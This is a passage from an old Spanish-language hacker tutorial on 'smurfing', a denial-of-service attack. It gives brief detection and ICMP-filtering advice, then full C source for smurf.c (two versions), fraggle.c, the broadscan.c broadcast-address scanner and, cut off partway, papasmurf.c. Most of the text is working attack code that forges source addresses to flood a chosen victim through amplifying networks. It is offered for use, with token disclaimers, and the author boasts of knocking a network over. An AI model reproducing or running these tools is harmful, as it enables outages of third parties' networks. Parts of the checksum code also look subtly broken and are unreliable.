  hasta una T3, es la leche. Puedo asegurar que desde una T1 (a la cual
  tenemos acceso) funciona muy bien y la red se va al carajo en muy poco
  tiempo, el experimento fue realizado en la VPN (Virtual Private Network)
  de - J.J.F. / Hackers Team -, no os recomiendo que jugueis con las redes
  de la universidad, os pueden pillar :o).

  3.- Como arreglarlo/detectarlo
  ------------------------------

        Este es otro problema que tiene el SMURFING, no se puede arreglar. Al
  ser un ataque relativamente nuevo, todavia no se ha encontrado algo para
  arreglarlo. Si se ha encontrado la manera de detectarlo y encontrar al que
  te esta lanzando el ataque. Es un archivo para UNIX (en LinuX supongo que
  tambien chutara, no lo he probado) que se llama Smurflog.tgz, el cual lo
  podreis encontrar en http://www.rootshell.com. Se puede intentar arreglar de
  dos formas. Una de ellas es usando el smurlog.tgz y otra es cambiando las
  preferencias de la maquina, es decir con un filtro.

        Si no me equivoco, ahora mismo MCI esta trabajando en un parche para
  el smurf.c, podeis mirar por:
  http://www.internetnews.com/isp-news/1997/10/0901-mci.html

  3.1.- Usando smurflog.tgz
  -------------------------

        Este es un programa para UNIX, que basicamente lo que hace es loguear
  todo el proceso de ataque el cual te da quien te esta atacando y desde
  donde te esta atacando.

  3.2.- Filtrando informacion
  ---------------------------

        Se podria decir que esta es una manera un poco rudimentaria de
  protegerse del SMURFING. Lo que se hace es no aceptar paquetes de ICMP. Es
  una manera un poco lenta, pero evitas el riesgo de ataque o al menos reduce
  el dao que le pueda causar al ordenador. La verdad es que tambien al tener
  una red, el router juega un papel importante, como dije antes puedes denegar
  los accesos de ICMP, pero no es una de las mejores soluciones, aunque ayuda
  a que no entren paquetes ICMP. Lo bueno que tiene usar el router y denegar
  paquetes ICMP es que cuando se manda el ataque pasa a traves del router y
  si el router no lo identifica hace que el ataque no funcione. Esto se puede
  hacer simplemente aadiendo una linea al router, pero como dije antes, lo
  que hace es denegar ICMP hasta que termine el ataque.

  4.- Herramientas
  ----------------

        Basicamente se necesitan 5 programas para llevar a cabo este ataque y
  de los cuales esta puesto el codigo fuente un poco mas abajo de estas lineas
  :o). Pero antes vamos a ver que necesitamos.

  smurf.c: El smurf puro y duro, compilar y ejecutar.
  fraggle.c: Se puede decir que es un smurf, pero ya mas avanzado.
  broadscan.c: Scanner de IP's para saber por donde atacas, muy util.
  papasmurf.c: Es una mezcla entre el smurf.c y el fraggle.c
  papasmurf-linux.c: Claro, no? para que los usuarios de LinuX tambien puedan
                     jugar :o), es un programa que solo corre en plataforma
                     LinuX, de hecho esta especialmente diseado para LinuX.

        Bien, despues de esta pequea introduccion de las herramientas, vamos
  a ver los programas en pelota, es decir su codigo fuente, aqui van:

  SMURF.C (versiones 4.0 y 5.0)
  -----------------------------

  --- smurf.c v4.0 ---

------------ Codigo Fuente ---------------------------------------------------

/*
 *
 *  $Id smurf.c,v 4.0 1997/10/11 13:02:42 EST tfreak Exp $
 *
 *  spoofs icmp packets from a host to various broadcast addresses resulting
 *  in multiple replies to that host from a single packet.
 *
 *  disclaimer:
 *     I cannot and will not be held responsible nor legally bound for the
 *     malicious activities of individuals who come into possession of this
 *     program and I refuse to provide help or support of any kind and do NOT
 *     condone use of this program to deny service to anyone or any machine.
 *     This is for educational use only. Please Don't abuse this.
 *
 *
 */

#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netdb.h>
#include <ctype.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <string.h>

void banner(void);
void usage(char *);
void smurf(int, struct sockaddr_in, u_long, int);
void ctrlc(int);
unsigned short in_chksum(u_short *, int);

/* stamp */
char id[] = "$Id smurf.c,v 4.0 1997/10/11 13:02:42 EST tfreak Exp $";

int main (int argc, char *argv[])
{
   struct sockaddr_in sin;
   struct hostent *he;
   FILE   *bcastfile;
   int    i, sock, bcast, delay, num, pktsize, cycle = 0, x;
   char   buf[32], **bcastaddr = malloc(8192);

   banner();
   signal(SIGINT, ctrlc);

   if (argc < 6) usage(argv[0]);

   if ((he = gethostbyname(argv[1])) == NULL) {
      perror("resolving source host");
      exit(-1);
   }
   memcpy((caddr_t)&sin.sin_addr, he->h_addr, he->h_length);
   sin.sin_family = AF_INET;
   sin.sin_port = htons(0);

   num = atoi(argv[3]);
   delay = atoi(argv[4]);
   pktsize = atoi(argv[5]);

   if ((bcastfile = fopen(argv[2], "r")) == NULL) {
      perror("opening bcast file");
      exit(-1);
   }
   x = 0;
   while (!feof(bcastfile)) {
      fgets(buf, 32, bcastfile);
      if (buf[0] == '#' || buf[0] == '\n' || ! isdigit(buf[0])) continue;
      for (i = 0; i < strlen(buf); i++)
          if (buf[i] == '\n') buf[i] = '\0';
      bcastaddr[x] = malloc(32);
      strcpy(bcastaddr[x], buf);
      x++;
   }
   bcastaddr[x] = 0x0;
   fclose(bcastfile);

   if (x == 0) {
      fprintf(stderr, "ERROR: no broadcasts found in file %s\n\n", argv[2]);
      exit(-1);
   }
   if (pktsize > 1024) {
      fprintf(stderr, "ERROR: packet size must be < 1024\n\n");
      exit(-1);
   }

   if ((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
      perror("getting socket");
      exit(-1);
   }
   setsockopt(sock, SOL_SOCKET, SO_BROADCAST, (char *)&bcast, sizeof(bcast));

   printf("Flooding %s (. = 25 outgoing packets)\n", argv[1]);

   for (i = 0; i < num || !num; i++) {
      if (!(i % 25)) { printf("."); fflush(stdout); }
      smurf(sock, sin, inet_addr(bcastaddr[cycle]), pktsize);
      cycle++;
      if (bcastaddr[cycle] == 0x0) cycle = 0;
      usleep(delay);
   }
   puts("\n\n");
   return 0;
}

void banner (void)
{
   puts("\nsmurf.c v4.0 by TFreak\n");
}

void usage (char *prog)
{
   fprintf(stderr, "usage: %s <target> <bcast file> "
                   "<num packets> <packet delay> <packet size>\n\n"
                   "target        = address to hit\n"
                   "bcast file    = file to read broadcast addresses from\n"
                   "num packets   = number of packets to send (0 = flood)\n"
                   "packet delay  = wait between each packet (in ms)\n"
                   "packet size   = size of packet (< 1024)\n\n", prog);
   exit(-1);
}

void smurf (int sock, struct sockaddr_in sin, u_long dest, int psize)
{
   struct iphdr *ip;
   struct icmphdr *icmp;
   char *packet;

   packet = malloc(sizeof(struct iphdr) + sizeof(struct icmphdr) + psize);
   ip = (struct iphdr *)packet;
   icmp = (struct icmphdr *) (packet + sizeof(struct iphdr));

   memset(packet, 0, sizeof(struct iphdr) + sizeof(struct icmphdr) + psize);

   ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct icmphdr) + psize);
   ip->ihl = 5;
   ip->version = 4;
   ip->ttl = 255;
   ip->tos = 0;
   ip->frag_off = 0;
   ip->protocol = IPPROTO_ICMP;
   ip->saddr = sin.sin_addr.s_addr;
   ip->daddr = dest;
   ip->check = in_chksum((u_short *)ip, sizeof(struct iphdr));
   icmp->type = 8;
   icmp->code = 0;
  icmp->checksum = in_chksum((u_short *)icmp, sizeof(struct icmphdr) + psize);

   sendto(sock, packet, sizeof(struct iphdr) + sizeof(struct icmphdr) + psize,
          0, (struct sockaddr *)&sin, sizeof(struct sockaddr));

   free(packet);           /* free willy! */
}

void ctrlc (int ignored)
{
   puts("\nDone!\n");
   exit(1);
}

unsigned short in_chksum (u_short *addr, int len)
{
   register int nleft = len;
   register int sum = 0;
   u_short answer = 0;

   while (nleft > 1) {
      sum += *addr++;
      nleft -= 2;
   }

   if (nleft == 1) {
      *(u_char *)(&answer) = *(u_char *)addr;
      sum += answer;
   }

   sum = (sum >> 16) + (sum + 0xffff);
   sum += (sum >> 16);
   answer = ~sum;
   return(answer);
}

------------ FIN -------------------------------------------------------------

  --- smurf.c v5.0 ---

------------ Codigo Fuente ---------------------------------------------------

/*
 * $Id smurf.c,v 5.0 1997/10/13 22:37:21 CDT griffin Exp $
 *
 * spoofs icmp packets from a host to various broadcast addresses resulting in
 * multiple replies to that host from a single packet.
 *
 * disclaimer: I cannot and will not be held responsible nor legally bound for
 * the malicious activities of individuals who come into possession of this
 * program and I refuse to provide help or support of any kind and do NOT
 * condone use of this program to deny service to anyone or any machine. This
 * is for educational use only. Please Don't abuse this.
 *
 *
 */

#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <ctype.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <string.h>

void            banner(void);
void            usage(char *);
void            smurf(int, struct sockaddr_in, u_long, int);
void            ctrlc(int);
unsigned int    host2ip(char *hostname);
unsigned short  in_chksum(u_short *, int);

unsigned int
host2ip(char *hostname)
{
        static struct in_addr i;
        struct hostent *h;
        i.s_addr = inet_addr(hostname);
        if (i.s_addr == -1) {
                h = gethostbyname(hostname);
                if (h == NULL) {
                        fprintf(stderr, "can't find %s\n.", hostname);
                        exit(0);
                }
                bcopy(h->h_addr, (char *) &i.s_addr, h->h_length);
        }
        return i.s_addr;
}

/* stamp */
char       id[] = "$Id smurf.c,v 5.0 1997/10/13 22:37:21 CDT griffin Exp $";

int
main(int argc, char *argv[])
{
        struct sockaddr_in sin;
        FILE           *bcastfile;
        int             i, sock, bcast, delay, num, pktsize, cycle = 0,
                        x;
        char            buf[32], **bcastaddr = malloc(8192);

        banner();
        signal(SIGINT, ctrlc);

        if (argc < 6)
                usage(argv[0]);

        sin.sin_addr.s_addr = host2ip(argv[1]);
        sin.sin_family = AF_INET;

        num = atoi(argv[3]);
        delay = atoi(argv[4]);
        pktsize = atoi(argv[5]);

        if ((bcastfile = fopen(argv[2], "r")) == NULL) {
                perror("opening bcast file");
                exit(-1);
        }
        x = 0;
        while (!feof(bcastfile)) {
                fgets(buf, 32, bcastfile);
                if (buf[0] == '#' || buf[0] == '\n' || !isdigit(buf[0]))
                        continue;
                for (i = 0; i < strlen(buf); i++)
                        if (buf[i] == '\n')
                                buf[i] = '\0';
                bcastaddr[x] = malloc(32);
                strcpy(bcastaddr[x], buf);
                x++;
        }
        bcastaddr[x] = 0x0;
        fclose(bcastfile);

        if (x == 0) {
        fprintf(stderr, "ERROR: no broadcasts found in file %s\n\n", argv[2]);
        exit(-1);
        }
        if (pktsize > 1024) {
                fprintf(stderr, "ERROR: packet size must be < 1024\n\n");
                exit(-1);
        }
        if ((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
                perror("getting socket");
                exit(-1);
        }
   setsockopt(sock, SOL_SOCKET, SO_BROADCAST, (char *) &bcast, sizeof(bcast));

        printf("Flooding %s (. = 25 outgoing packets)\n", argv[1]);

        for (i = 0; i < num || !num; i++) {
                if (!(i % 25)) {
                        printf(".");
                        fflush(stdout);
                }
                smurf(sock, sin, inet_addr(bcastaddr[cycle]), pktsize);
                cycle++;
                if (bcastaddr[cycle] == 0x0)
                        cycle = 0;
                usleep(delay);
        }
        puts("\n\n");
        return 0;
}

void
banner(void)
{
        puts("\nsmurf.c v5.0 by TFreak, ported by Griffin\n");
}

void
usage(char *prog)
{
        fprintf(stderr, "usage: %s <target> <bcast file> "
                "<num packets> <packet delay> <packet size>\n\n"
                "target        = address to hit\n"
                "bcast file    = file to read broadcast addresses from\n"
                "num packets   = number of packets to send (0 = flood)\n"
                "packet delay  = wait between each packet (in ms)\n"
                "packet size   = size of packet (< 1024)\n\n", prog);
        exit(-1);
}

void
smurf(int sock, struct sockaddr_in sin, u_long dest, int psize)
{
        struct ip      *ip;
        struct icmp    *icmp;
        char           *packet;
        int             hincl = 1;

        packet = malloc(sizeof(struct ip) + sizeof(struct icmp) + psize);
        ip = (struct ip *) packet;
        icmp = (struct icmp *) (packet + sizeof(struct ip));

        memset(packet, 0, sizeof(struct ip) + sizeof(struct icmp) + psize);
        setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &hincl, sizeof(hincl));
        ip->ip_len = sizeof(struct ip) + sizeof(struct icmp) + psize;
        ip->ip_hl = sizeof *ip >> 2;
        ip->ip_v = 4;
        ip->ip_ttl = 255;
        ip->ip_tos = 0;
        ip->ip_off = 0;
        ip->ip_id = htons(getpid());
        ip->ip_p = 1;
        ip->ip_src.s_addr = sin.sin_addr.s_addr;
        ip->ip_dst.s_addr = dest;
        ip->ip_sum = 0;
        icmp->icmp_type = 8;
        icmp->icmp_code = 0;
        icmp->icmp_cksum = htons(~(ICMP_ECHO << 8));

        sendto(sock, packet, sizeof(struct ip) + sizeof(struct icmp) + psize,
               0, (struct sockaddr *) & sin, sizeof(struct sockaddr));

        free(packet);           /* free willy! */
}

void
ctrlc(int ignored)
{
        puts("\nDone!\n");
        exit(1);
}

unsigned short
in_chksum(u_short * addr, int len)
{
        register int    nleft = len;
        register int    sum = 0;
        u_short         answer = 0;

        while (nleft > 1) {
                sum += *addr++;
                nleft -= 2;
        }

        if (nleft == 1) {
                *(u_char *) (&answer) = *(u_char *) addr;
                sum += answer;
        }
        sum = (sum >> 16) + (sum + 0xffff);
        sum += (sum >> 16);
        answer = ~sum;
        return (answer);
}

------------ FIN -------------------------------------------------------------

  --- fraggle.c ---

------------ Codigo Fuente ---------------------------------------------------

/*
 *  fraggle.c by TFreak
 *
 *  This is basically smurf.c with a udp twist.  There are _many_ interesting
 *  things you can do with this program, I suggest you experiment with it.
 *
 *  Disclaimer:
 *     I cannot and will not be held responsible nor legally bound for the
 *     malicious activities of individuals who come into possession of this
 *     program and I refuse to provide help or support of any kind and do NOT
 *     condone or promote use of this program to deny service to anyone or any
 *     machine.  This is for educational use only. Please don't abuse this.
 *
 *  "Love is much more evil than hate will ever be ..."
 */

#include <arpa/inet.h>
#include <ctype.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_udp.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <time.h>
#include <unistd.h>

struct pktinfo
{
    int ps;
    int src;
    int dst;
};

void fraggle (int, struct sockaddr_in *, u_long dest, struct pktinfo *);
void sigint (int);
unsigned short checksum (u_short *, int);  

int main (int argc, char *argv[])
{
    struct sockaddr_in sin;
    struct hostent *he;
    struct pktinfo p;
    int s, num, delay, n, cycle;
    char **bcast = malloc(1024), buf[32];
    FILE *bfile;

    /* banner */
    fprintf(stderr, "\nfraggle.c by TFreak\n\n");

    /* capture ctrl-c */
    signal(SIGINT, sigint);

    /* check for enough cmdline args */
    if (argc < 5)
    {
        fprintf(stderr, "usage: %s <target> <bcast file> <num packets> "
                        "<packet delay> [dstport] [srcport] [psize] \n\n"
                        "target\t\t= address to hit\n"
                        "bcast file\t= file containing broadcast addrs\n"
                        "num packets\t= send n packets (n = 0 is constant)\n"
                        "packet delay\t= usleep() between packets (in ms)\n"
                        "dstport\t\t= port to hit (default 7)\n"
                        "srcport\t\t= source port (0 for random)\n"
                        "ps\t\t= packet size\n\n",
                        argv[0]);
        exit(-1);
    }

    /* get port info */
    if (argc >= 6)
        p.dst = atoi(argv[5]);
    else
        p.dst = 7;
    if (argc >= 7)
        p.src = atoi(argv[6]);
    else
        p.src = 0;

    /* packet size redundant if not using echo port */
    if (argc >= 8)
        p.ps = atoi(argv[7]);
    else
        p.ps = 1;

    /* other variables */
    num = atoi(argv[3]);
    delay = atoi(argv[4]);

    /* resolve host */
    if (isdigit(*argv[1]))
        sin.sin_addr.s_addr = inet_addr(argv[1]);
    else
    {
        if ((he = gethostbyname(argv[1])) == NULL)
        {
            fprintf(stderr, "Can't resolve hostname!\n\n");
            exit(-1);
        }

        memcpy( (caddr_t) &sin.sin_addr, he->h_addr, he->h_length);
    }
    sin.sin_family = AF_INET;
    sin.sin_port = htons(0);

    /* open bcast file and build array */
    if ((bfile = fopen(argv[2], "r")) == NULL)
    {
        perror("opening broadcast file");
        exit(-1);
    }
    n = 0;
    while (fgets(buf, sizeof buf, bfile) != NULL)
    {
        buf[strlen(buf) - 1] = 0;
        if (buf[0] == '#' || buf[0] == '\n' || ! isdigit(buf[0])) 
            continue;
        bcast[n] = malloc(strlen(buf) + 1);
        strcpy(bcast[n], buf);
        n++;
    }
    bcast[n] = '\0';
    fclose(bfile);

    /* check for addresses */
    if (!n)
    {
        fprintf(stderr, "Error:  No valid addresses in file!\n\n");
        exit(-1);
    }

    /* create our raw socket */
    if ((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) <= 0)
    {
        perror("creating raw socket");
        exit(-1);
    }

    printf("Flooding %s (. = 25 outgoing packets)\n", argv[1]);

    for (n = 0, cycle = 0; n < num || !num; n++)
    {
        if (!(n % 25))
        {
            printf(".");
            fflush(stdout);
        }

        srand(time(NULL) * rand() * getpid());

        fraggle(s, &sin, inet_addr(bcast[cycle]), &p);
        if (bcast[++cycle] == NULL) 
            cycle = 0;
        usleep(delay);
    }

    sigint(0);
}

void fraggle (int s, struct sockaddr_in *sin, u_long dest, struct pktinfo *p)
{
    struct iphdr *ip;
    struct udphdr *udp;
    char *packet;
    int r;

    packet = malloc(sizeof(struct iphdr) + sizeof(struct udphdr) + p->ps);
    ip = (struct iphdr *)packet;
    udp = (struct udphdr *) (packet + sizeof(struct iphdr));

    memset(packet, 0, sizeof(struct iphdr) + sizeof(struct udphdr) + p->ps);

    /* ip header */
    ip->protocol = IPPROTO_UDP;
    ip->saddr = sin->sin_addr.s_addr;
    ip->daddr = dest;
    ip->version = 4;
    ip->ttl = 255;
    ip->tos = 0;
    ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct udphdr) + p->ps);
    ip->ihl = 5;
    ip->frag_off = 0;
    ip->check = checksum((u_short *)ip, sizeof(struct iphdr));

    /* udp header */
    udp->len = htons(sizeof(struct udphdr) + p->ps);
    udp->dest = htons(p->dst);
    if (!p->src)
        udp->source = htons(rand());
    else
        udp->source = htons(p->src);

    /* send it on its way */
   r = sendto(s, packet, sizeof(struct iphdr) + sizeof(struct udphdr) + p->ps,
               0, (struct sockaddr *) sin, sizeof(struct sockaddr_in));
    if (r == -1)
    {
        perror("\nSending packet");
        exit(-1);
    }

    free(packet);		/* free willy 2! */
}

unsigned short checksum (u_short *addr, int len)
{
    register int nleft = len;
    register u_short *w = addr;
    register int sum = 0;
    u_short answer = 0;

    while (nleft > 1)
    {
        sum += *w++;
        nleft--;
    }

    if (nleft == 1)
    {
        *(u_char *) (&answer) = *(u_char *) w;
        sum += answer;
    }

    sum = (sum >> 17) + (sum & 0xffff);
    sum += (sum >> 17);
    answer = -sum;
    return (answer);
}

void sigint (int ignoremewhore)
{
    fprintf(stderr, "\nDone!\n\n");
    exit(0);
}

------------ FIN -------------------------------------------------------------

  --- broadscan.c v0.31 ---

------------ Codigo Fuente ---------------------------------------------------

/* Broadscan v 0.31   DUP Broadcast IP scanner
   by Vacuum http://www.technotronic.com   09-03-98
   This is a very lame scanner written to
   stop people from asking how to find
   DUP broadcast ip addresses. Use this in
   conjunction with smurf, fraggle,
   or papasmurf. DoS kiddies enjoy!

*/#include <stdlib.h>
#include <stdio.h>
#define DEBUG 1FILE *stream;
void pingz0r(int first, int second, int start, int end)
{
int counter,flag;
FILE *stream;
char tempstring[2048];
char parse[2048];
for (counter=start; counter <end; counter++)
{
 flag=0;
 sprintf(tempstring,"ping -c 2 -n  %d.%d.%d.255 2>/dev/null",first,
                     second, counter); 
stream=popen(tempstring,"r");
 while (fgets(parse,sizeof(parse),stream)!=NULL)
 {
  if (DEBUG) printf("Results:%s",parse);
  if (strstr(parse,"DUP"))
  {
    flag=1;
    fclose(stream);
    break;
  }
 }
 if (flag==1) stream=fopen("broadcast.txt", "a");
  fprintf(stream, "%d.%d.%d.255\n",first,second,counter);
 fclose( stream);
}
}
main(int argc, char *argv[])
{
int first,second;
if (argc!=3)
 {
  printf("\nusage : %s <octet> <octet>\n\n",argv[0]);
  exit(0);
 }
first=atoi(argv[1]);second=atoi(argv[2]);
if (first==127)
 {
 printf("%d is a localhost. You have no clue or are trying
 to break this program",first);
 exit(0);
 }
if (first>254  || first <0)
 {
 printf("First octet is: %d. It must be between <1-254>",first);
 exit(0);
 }
if (second>254 || second<0)
 {
 printf("Second octet is: %d. It must be <1-254>",second);
 exit(0);
 }
 printf("Scanning for DUP broadcast ip addresses\n");
printf("Results output to broadcast.txt\n");
if (fork()!=0)
	pingz0r(first,second,0,128);
else
	pingz0r(first,second,128,255);
}

------------ FIN -------------------------------------------------------------

  --- papasmurf.c v5.0 ---

------------ Codigo Fuente ---------------------------------------------------

/*
 *  (papa)smurf.c v5.0 by TFreak - http://www.rootshell.com
 *
 *
 *  To compile: "gcc -DLINUX -o smurf5 papasmurf.c" if your LINUXish.
 *                                 or just
 *              "gcc -o smurf5 papasmurf.c" if your BSDish.
 *  
 *  Old linux kernels won't have BSD header support, so this may not compile.
 */

/* End of Hideously Long Header */
                            
#include <stdio.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <arpa/inet.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include <time.h>
#ifdef LINUX 
#define __FAVOR_BSD                            /* should be __FAVOUR_BSD ;) */
#ifndef _USE_BSD
#define _USE_BSD
#endif
#endif
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netinet/udp.h>

#ifdef LINUX
#define FIX(n) 	htons(n)
#else
#define FIX(n) 	(n)
#endif

struct smurf_t
{
    struct sockaddr_in sin;                    /* socket prot structure */
    int s;                                     /* socket */
    int udp, icmp;                             /* icmp, udp booleans */
    int rnd;                                   /* Random dst port boolean */
    int psize;                                 /* packet size */
    int num;                                   /* number of packets to send */
    int delay;                                 /* delay between (in ms) */
    u_short dstport[25+1];                     /* dest port array (udp) */
    u_short srcport;                           /* source port (udp) */
    char *padding;                             /* junk data */
};

/* function prototypes */
void usage (char *);
u_long resolve (char *);
void getports (struct smurf_t *, char *);
void smurficmp (struct smurf_t *, u_long);
void smurfudp (struct smurf_t *, u_long, int);
u_short in_chksum (u_short *, int);

int 
main (int argc, char *argv[])
{
    struct smurf_t sm;
    struct stat st;
    u_long bcast[1024];
    char buf[32];
    int c, fd, n, cycle, num = 0, on = 1; 
    FILE *bcastfile;

    /* shameless self promotion banner */
    fprintf(stderr, "\n(papa)smurf.c v5.0 by TFreak\n\n");

    if (argc < 3) 
        usage(argv[0]);

    /* set defaults */
    memset((struct smurf_t *) &sm, 0, sizeof(sm));
    sm.icmp = 1;
    sm.psize = 64;
    sm.num = 0;
    sm.delay = 10000;
    sm.sin.sin_port = htons(0);
    sm.sin.sin_family = AF_INET;
    sm.srcport = 0;
    sm.dstport[0] = 7;

    /* resolve 'source' host, quit on error */
    sm.sin.sin_addr.s_addr = resolve(argv[1]);

    /* open the broadcast file */
    if ((bcastfile = fopen(argv[2], "r")) == NULL)
    {
        perror("Opening broadcast file");
        exit(-1);
    }

    /* parse out options */
    optind = 3;
    while ((c = getopt(argc, argv, "rRn:d:p:P:s:S:f:")) != -1)
    {
	switch (c)
	{
	    /* random dest ports */
	    case 'r':
		sm.rnd = 1;
		break;

	    /* random src/dest ports */
	    case 'R':
		sm.rnd = 1;
                sm.srcport = 0;
		break;

	    /* number of packets to send */
	    case 'n':
		sm.num = atoi(optarg);
		break;

	    /* usleep between packets (in ms) */
	    case 'd':
		sm.delay = atoi(optarg);
		break;

	    /* multiple ports */
	    case 'p':
		if (strchr(optarg, ',')) 
		    getports(&sm, optarg);
		else
		    sm.dstport[0] = (u_short) atoi(optarg);
		break;

	    /* specify protocol */
	    case 'P':
		if (strcmp(optarg, "icmp") == 0)
		{
		    /* this is redundant */
		    sm.icmp = 1;
		    break;
		}
		if (strcmp(optarg, "udp") == 0)
		{
		    sm.icmp = 0;
		    sm.udp = 1;
		    break;
		}
		if (strcmp(optarg, "both") == 0)
		{
		    sm.icmp = 1;
		    sm.udp = 1;
		    break;
		}

		puts("Error: Protocol must be icmp, udp or both");
		exit(-1);

	    /* source port */
	    case 's':
		sm.srcport = (u_short) atoi(optarg);
		break;

	    /* specify packet size */
	    case 'S':
		sm.psize = atoi(optarg);
		break;

	    /* filename to read padding in from */
	    case 'f':
		/* open and stat */
		if ((fd = open(optarg, O_RDONLY)) == -1)
		{
		    perror("Opening packet data file");
		    exit(-1);
		}
		if (fstat(fd, &st) == -1)
		{
		    perror("fstat()");
		    exit(-1);
		}

		/* malloc and read */
		sm.padding = (char *) malloc(st.st_size);
		if (read(fd, sm.padding, st.st_size) < st.st_size)
		{
		    perror("read()");
		    exit(-1);
		}

		sm.psize = st.st_size;
		close(fd);
		break;

            default:
                usage(argv[0]);
        }
    } /* end getopt() loop */
	    
    /* create packet padding if neccessary */
    if (!sm.padding)
    {
	sm.padding = (char *) malloc(sm.psize);
	memset(sm.padding, 0, sm.psize);
    }

    /* create the raw socket */
    if ((sm.s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
    {
	perror("Creating raw socket (are you root?)");
	exit(-1);
    }

    /* Include IP headers ourself (thanks anyway though) */
  if (setsockopt(sm.s, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == -1)
    {
	perror("setsockopt()");
	exit(-1);
    }

    /* read in our broadcasts and store them in our array */
    while (fgets(buf, sizeof buf, bcastfile) != NULL)
    {
	char *p;
	int valid;

        /* skip over comments/blank lines */
        if (buf[0] == '#' || buf[0] == '\n') continue;

        /* get rid of newline */ 
        buf[strlen(buf) - 1] = '\0';

        /* check for valid address */
        for (p = buf, valid = 1; *p != '\0'; p++)
        {
            if ( ! isdigit(*p) && *p != '.' ) 
            {
                fprintf(stderr, "Skipping invalid ip %s\n", buf);
                valid = 0;
                break;
            }
        }

        /* if valid address, copy to our array */
        if (valid)
        {
	    bcast[num] = inet_addr(buf);
            num++;
	    if (num == 1024)
		break;
        }
    } /* end bcast while loop */

    /* seed our random function */
    srand(time(NULL) * getpid());

    /* wee.. */
    for (n = 0, cycle = 0; n < sm.num || !sm.num; n++)
    {
	if (sm.icmp)
	    smurficmp(&sm, bcast[cycle]);

	if (sm.udp)
	{
	    int x;
	    for (x = 0; sm.dstport[x] != 0; x++)
	        smurfudp(&sm, bcast[cycle], x);
	}

	/* quick nap */
	usleep(sm.delay);

	/* cosmetic psychadelic dots */
	if (n % 50 == 0)
	{
	    printf(".");
	    fflush(stdout);
	}

	cycle = (cycle + 1) % num;
    }

    exit(0);
}

void 
usage (char *s)
{
    fprintf(stderr,
            "usage: %s <source host> <broadcast file> [options]\n"
	    "\n"
	    "Options\n"
	    "-p:	Comma separated list of dest ports (default 7)\n"
	    "-r:	Use random dest ports\n"
	    "-R:	Use random src/dest ports\n"
	    "-s:	Source port (0 for random (default))\n"
	    "-P:	Protocols to use.  Either icmp, udp or both\n"
	    "-S:	Packet size in bytes (default 64)\n"
	    "-f:	Filename containg packet data (not needed)\n"
	    "-n:	Num of packets to send (0 is continuous (default))\n"
	    "-d:	Delay inbetween packets (in ms) (default 10000)\n"
	    "\n", s);
    exit(-1);
}

u_long 
resolve (char *host)
{
    struct in_addr in;
    struct hostent *he;

    /* try ip first */
    if ((in.s_addr = inet_addr(host)) == -1)
    {
	/* nope, try it as a fqdn */
	if ((he = gethostbyname(host)) == NULL)
	{
	    /* can't resolve, bye. */
            herror("Resolving victim host");
	    exit(-1);
	}

	memcpy( (caddr_t) &in, he->h_addr, he->h_length);
    }

    return(in.s_addr);
}

void 
getports (struct smurf_t *sm, char *p)
{
    char tmpbuf[16];
    int n, i;

    for (n = 0, i = 0; (n < 25) && (*p != '\0'); p++, i++)
    {
	if (*p == ',')
	{
            tmpbuf[i] = '\0';
	    sm->dstport[n] = (u_short) atoi(tmpbuf);
	    n++; i = -1;
	    continue;
	}

	tmpbuf[i] = *p;
    }
    tmpbuf[i] = '\0';
    sm->dstport[n] = (u_short) atoi(tmpbuf);
    sm->dstport[n + 1] = 0;
}

void
smurficmp (struct smurf_t *sm, u_long dst)
{
    struct ip *ip;
    struct icmp *icmp;
    char *packet;

    int pktsize = sizeof(struct ip) + sizeof(struct icmp) + sm->psize;

    packet = malloc(pktsize);
    ip = (struct ip *) packet;
    icmp = (struct icmp *) (packet + sizeof(struct ip));

    memset(packet, 0, pktsize);

    /* fill in IP header */
    ip->ip_v = 4;
    ip->ip_hl = 5;
    ip->ip_tos = 0;
    ip->ip_len = FIX(pktsize);
    ip->ip_ttl = 255;
    ip->ip_off = 0;
    ip->ip_id = FIX( getpid() );
    ip->ip_p = IPPROTO_ICMP;
    ip->ip_sum = 0;
    ip->ip_src.s_addr = sm->sin.sin_addr.s_addr;
    ip->ip_dst.s_addr = dst;

    /* fill in ICMP header */
    icmp->icmp_type = ICMP_ECHO;
    icmp->icmp_code = 0;
    icmp->icmp_cksum = htons(~(ICMP_ECHO << 8));	/* thx griffin */

    /* send it on its way */
    if (sendto(sm->s, packet, pktsize, 0, (struct sockaddr *) &sm->sin,
        sizeof(struct sockaddr)) == -1)
    {
	perror("sendto()");
	exit(-1);
    }

    free(packet);					/* free willy! */
}

void
smurfudp (struct smurf_t *sm, u_long dst, int n)
{
    struct ip *ip;
    struct udphdr *udp;
    char *packet, *data;

    int pktsize = sizeof(struct ip) + sizeof(struct udphdr) + sm->psize;

    packet = (char *) malloc(pktsize);
    ip = (struct ip *) packet;
    udp = (struct udphdr *) (packet + sizeof(struct ip));
    data = (char *) (packet + sizeof(struct ip) + sizeof(struct udphdr));

    memset(packet, 0, pktsize);
    if (*sm->padding)
        memcpy((char *)data, sm->padding, sm->psize);

    /* fill in IP header */
    ip->ip_v = 4;
    ip->ip_hl = 5;
    ip->ip_tos = 0;
    ip->ip_len = FIX(pktsize);
